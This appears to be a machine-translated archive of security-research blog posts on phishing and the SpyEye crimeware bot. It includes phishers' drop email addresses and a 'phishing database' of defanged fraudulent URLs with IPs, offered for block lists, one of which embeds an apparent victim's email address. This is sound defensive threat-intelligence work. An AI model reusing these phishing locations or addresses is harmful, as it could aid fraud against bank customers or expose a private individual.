  • usa813@easy.com
  • usa813@hotmail.fr
  • zoka_1845497@usa814.freezoka.com
  • usa813@excite.co.uk
  • usa813@gmx.com
We thus face a diversion of the phishers, which conjurers who put us in the eyes what they want to believe, while the actual operation beyond superficial looks.

An important fact which emerges from the analysis against the server is that within the same pages are also posing as the other two banks, Lloyds TSB:

And Bank of America, both with the same defense mechanism in the CSS.


As we see, the mechanisms used for phishing attacks also perfected every day, not just around their attack strategies, but also on their defense mechanisms, which in this case, running a diversion interesting.

Related information
Phishing database I
Phishing Kit In-the-Wild for cloning website, version 2
Phishing Kit In-the-Wild for cloning website
Phishing y "cuentos" en navidad
Phishing para American Express y consejos

Ernesto Martin
Crimeware Researcher in Malware Intelligence

Ver más

10.2.10

SpyEye Bot. Analysis of a new alternative scenario crimeware

Earlier this year saw the light in the underground black market that moves the axes of crimeware, a new application designed to provide feedback for criminal and fraudulent business.

This application, called SpyEye, is aimed at facilitating the recruitment of zombies and managing your network (C&C - Command and Control) through management panel via the web, from which it is possible to process the information obtained (intelligence) and stored in statistics, a common activity of criminal packages today.

Depending on their characteristics, very similar to those proposed by his counterpart ZeuS, SpyEye is presented as a potential successor to this within the scenario crimeware. Furthermore, it is evident that the criminal activities now represent a large business where cyber criminals and would-be cyber criminals abuse their "kindness".

This document describes the activities of SpyEye from the stage of infection giving relevant information about their purpose.

The full document can be downloaded from:

Spanish version
English version

Related information
Compendio Anual de Información. El crimeware durante el 2009
SpyEye Bot. New bot on the market

Jorge Mieres

Ver más

8.2.10

Phishing database I

Phishing responds to a purely criminal activity, part of the circuit that drives the illegal business of crimeware, designed to steal money using the sensitive and private information from users that criminals obtained through non-sacred activities.

Therefore, as a preventive measure, it's important not to allow access to the domains that host usually banks cloned pages, webmail and any other Internet service through a process that requires authentication.

To that end, born Phishing database, a compendium of fraudulent domains for implementing a plunger of phishing, which can be used to create the block lists.

Wachovia Corporation
http://www.stc.lk/it/home/online.wachovia.com/accountupdate/AuthService.php?action=presentLogin&url=https%3a//onlineservices.wachovia.com/NASApp/NavApp/Titanium%3faction%3dreturnHome (96.30.15.196) - United States

PayPal
h**p://aurelie-et-arnaud.me/img/paypal/verify/login.php (213.186.33.87) - France
h**p://www.yvescochet.net/.secure.paypal.fr/verified_by_paypal/webscrcmd=_login-run/cgi-bin/_login/ (213.186.33.2) - France
h**p://dz-tero.com/paypal/ (74.217.128.53) - Canada
h**p://www.paypal.com.0ytyz0oxg18bu.124nruo3kb3j903ers01.com/cgi-bin/webscr/?login-dispatch&login_email=unnimay@aol.com&ref=pp&login-processing=ok (195.56.18.126) - Hungary Hungary
h**p://www.124nruo3kb3j903ers01.com/cgi-bin/webscr/ (195.56.18.126) - Hungary
h**p://www.syrianaction.com/data/.confirm/paypal/ (88.198.217.51) - Germany
h**p://www.paypalcomservupdate.intl-paypal1.com/us/cgi-bin/?cmd=_login-run (218.36.124.140) - Korea, Republic Of
h**p://ukghd.com/images/www.paypal.com/cgi-bin/webscr.htm?cmd=_login-run (85.192.32.211) - Russian Federation
h**p://203.101.73.204/www.paypal.com.au/security/cgi-bin/webscr.htm?cmd=_login-run - India
h**p://52274548.es.strato-hosting.eu/lol/webscr.php?cmd=LogIn (81.169.145.81) - Germany
h**p://www.kules.knows.nl/cgi/ (91.121.2.117) - France
h**p://lejournalduthesard.info/help/css/update/online-information/fr/verefication-compte/online-update/webscr.php?cmd=_login-run&dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0e57b2ad7d754c297ea32a3580bcf6dcb357b2ad7d754c297ea32a3580bcf6dcb3
h**p://208.101.19.98/~mikorg/ - United States
h**p://iwww.cz.cc/PayPal.fr/paypal/fr/webscr.php?cmd=_login-run&dispatch=5885d80a13c0db1f998ca054efbdf2c29878a435fe324eec2511727fbf3e9efc0779736997661668caf8ff5d99e81fe40779736997661668caf8ff5d99e81fe4

egg
h**p://www.luxor2020.com/about/files/Image/jpg/txt/neweggcom/security/customer/index.html (207.210.125.219) - United States

CUA
h**p://www.zoi-creation.com/customers.cua.com.au/webbanker/CUA/2/notice.htm
h**p://www.zoi-creation.com/customers.cua.com.au/webbanker/CUA/ (93.184.35.226) - France

HSBC
h**p://cmodz-hosting.com/upload/cache/IBlogin.html (66.102.237.82) - United States
h**p://www.w650-france.com//forum/modules/index.html (213.186.33.4) - France
h**p://www.ifsb.co.kr/bbs/data/guest/gold/folder/folder/New%20Folder/United2/Folder/Folder/Folder/Folder/Folder/Folder/Folder/empty/empty/empty/United2/United/United/United/HSBC/index.html (210.102.34.17) - Korea, Republic Of
h**p://dodongminhhien.com/modules/pib-home/2/1/personal/hsbc.co.uk/IBlogin.html (203.113.173.20) - Viet Nam

eBay
h**p://rahasiabisnis21.com/_space/apache_module.php (202.69.111.58) - Indonesia
h**p://www.ebay.motors-cgi-items.com/cars-trucks_2003-BMW330I_W0QQitemZ15982632345413QQihZ012QQcategory-cars-trucksZ21983317QQssPageNameZWDVWQQrdZ1QQcmdZViewItems/index2.php (69.147.83.187) - United States
h**p://190-13-160-211.bk14-ipfija.surnet.cl/.ws-cgi/index.php - Chile
h**p://7beginnings.com/~sothebys/assets/profile/ws/login.html (203.211.129.222) - Singapore

JPMorgan Chase Bank
h**p://7beginnings.com/~sothebys/assets/profile/auth/secure/chase-sec/onlinebanking.chase.com=logon_confirm/ (203.211.129.222) - Singapore

In this case, in the same living space there is a breach against eBay phishing and another against JPMorgan Chase Bank in the IP address 203.211.129.222. The site is controlled by a shell in php call !islamicshell v. edition ADVANCED!.

The truth is that in addition to web upload cloned, the attacker can quietly, such as spreading malware of any type hosted on the server which hosts the site, including (a very common and which tend to be used the shell php) defacing.

Lloyds TSB Bank
h**p://www.ifsb.co.kr/bbs/data/guest/gold/folder/folder/New%20Folder/United2/Folder/Folder/Folder/Folder/Folder/Folder/Folder/empty/empty/empty/United2/United/United/United/Lloyds/customer.php (210.102.34.17) - Korea, Republic Of

Barclays
h**p://www.ifsb.co.kr/bbs/data/guest/gold/folder/folder/New%20Folder/United2/Folder/Folder/Folder/Folder/Folder/Folder/Folder/empty/empty/empty/United2/United/United/United/Barclays/LoginMember.login.htm (210.102.34.17) - Korea, Republic Of

Canada Revenue Agency
h**p://221.134.144.147/cra-arc.gc.ca/esrvc-srvce/tx/ndvdls/myrefund/getStatus_en.htm

Poste italiane
h**p://fgewfgewdfsa.pochta.ru/posste.html (82.204.219.221) - RU
h**p://mesagio-postepay.xaker.ru/postpayleg-clientesdasdhit.html (194.67.36.117) - RU

Abbey
h**p://www.velositas.com/update/myonlineacounts2.abbeynational.co.uk/Logonaction=prepared/Logonaction=prepare/ (75.126.202.209) - US

Jorge Mieres

Ver más